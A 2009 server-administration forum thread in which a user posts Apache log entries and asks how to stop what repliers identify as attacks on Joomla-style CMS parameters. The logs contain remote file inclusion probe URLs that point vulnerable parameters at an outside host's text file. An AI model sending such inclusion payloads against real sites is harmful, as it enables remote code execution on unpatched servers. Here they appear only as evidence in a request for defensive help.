How To Stop Attacks Coming From 'localhost.localdomain'?

Discussion in 'Server Operation' started by giganet, Mar 27, 2009.

  1. giganet

    giganet New Member

    Hello Group...

    Tonight I was looking over various logs in one of my servers and found when running 'tail -f /var/log/apache2/access.log' I see what appears to be an attack !!!???

    The output of 'tail -f /var/log/apache2/access.log'
    Code:
    localhost.localdomain - - [26/Mar/2009:13:07:10 -0700] "GET /?reflect_base=http://ecology41.t35.com/scans/damn/id.txt%3f%3f%3f HTTP/1.1" 200 4613 "-" "libwww-perl/5.805"
    localhost.localdomain - - [26/Mar/2009:13:09:50 -0700] "GET /?option=com_zoom&Itemid=38//%3fmosConfig_absolute_path=http://ecology41.t35.com/scans/damn/id.txt%3f%3f%3f HTTP/1.1" 200 4613 "-" "libwww-perl/5.805"
    localhost.localdomain - - [26/Mar/2009:13:09:50 -0700] "GET /?mosConfig_absolute_path=http://ecology41.t35.com/scans/damn/id.txt%3f%3f%3f HTTP/1.1" 200 4613 "-" "libwww-perl/5.805"
    localhost.localdomain - - [26/Mar/2009:13:11:15 -0700] "GET /?path%255Bdocroot%255D=http://ecology41.t35.com/scans/damn/id.txt%3f%3f%3f HTTP/1.1" 200 4613 "-" "libwww-perl/5.805"
    localhost.localdomain - - [26/Mar/2009:13:15:11 -0700] "GET /?path%255Bdocroot%255D=http://ecology41.t35.com/scans/damn/id.txt%3f%3f%3f HTTP/1.1" 200 4613 "-" "libwww-perl/5.805"
    localhost.localdomain - - [26/Mar/2009:13:15:12 -0700] "GET /?path%255Bdocroot%255D=http://ecology41.t35.com/scans/damn/id.txt%3f%3f%3f HTTP/1.1" 200 4613 "-" "libwww-perl/5.805"
    localhost.localdomain - - [26/Mar/2009:13:17:38 -0700] "GET /?reflect_base=http://ecology41.t35.com/scans/damn/id.txt%3f%3f%3f HTTP/1.1" 200 4613 "-" "libwww-perl/5.805"
    localhost.localdomain - - [26/Mar/2009:13:17:39 -0700] "GET /?reflect_base=http://ecology41.t35.com/scans/damn/id.txt%3f%3f%3f HTTP/1.1" 200 4613 "-" "libwww-perl/5.805"
    localhost.localdomain - - [26/Mar/2009:13:24:39 -0700] "GET /?option=com_content&v...i-asterisk-1-6-x&Itemid=6//%3fmosConfig_absolute_path=http://ecology41.t35.com/scans/damn/id.txt%3f%3f%3f HTTP/1.1" 200 4613 "-" "libwww-perl/5.805"
    localhost.localdomain - - [26/Mar/2009:13:24:40 -0700] "GET /?mosConfig_absolute_path=http://ecology41.t35.com/scans/damn/id.txt%3f%3f%3f HTTP/1.1" 200 4613 "-" "libwww-perl/5.805"
    
    Thanking you in advance for your help.

    Best Regards
     
  2. robilaur

    robilaur New Member

    delete id.txt and ban user :D
     
  3. Ben

    Ben ISPConfig Developer ISPConfig Developer

    Looks like an attack to joomla or similar cms?
    When googling for some of the parameter, e.g. mosConfig_absolute_path or reflect_base it looks like moscms or joomla.
     
  4. giganet

    giganet New Member

    Thank you for the replies...

    Robilaur:

    I searched the box for 'id.txt' but this file is non-existent.

    Also, how would I go about banning the user?
    I am not seeing any particular IP he is coming from, only 'localhost.localdomain'?


    Ben:

    Hmm, I never did personally like Joomla and the application has yet to been used so I just removed it entirely from the server.

    But I would still like to know how to ban the 'user' responsible though, your suggestions are very welcome.

    Thank you for your help...

    Best Regards
     

Share This Page